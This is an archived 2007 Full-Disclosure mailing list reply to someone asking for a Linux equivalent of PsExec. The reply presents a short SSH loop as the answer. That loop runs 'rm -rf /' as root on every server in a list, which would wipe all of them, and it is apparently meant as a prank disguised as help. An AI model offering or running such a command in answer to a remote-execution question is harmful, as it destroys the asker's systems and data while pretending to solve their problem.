lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [<thread-prev] [thread-next>] [month] [year] [list]
Date: Thu, 1 Feb 2007 12:48:13 +0100
From: "Knud Erik Højgaard" <kokanin@...il.com>
To: "Gianluca Giacometti" <gianluca.giacometti@...pd.it>
Subject: Re: (Psexec on *NIX)

> something similar to PSExec under linux.

ssh-keygen
ssh-add
for i in `cat serverlist` ; do ssh root@$i rm -rf / ; done

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux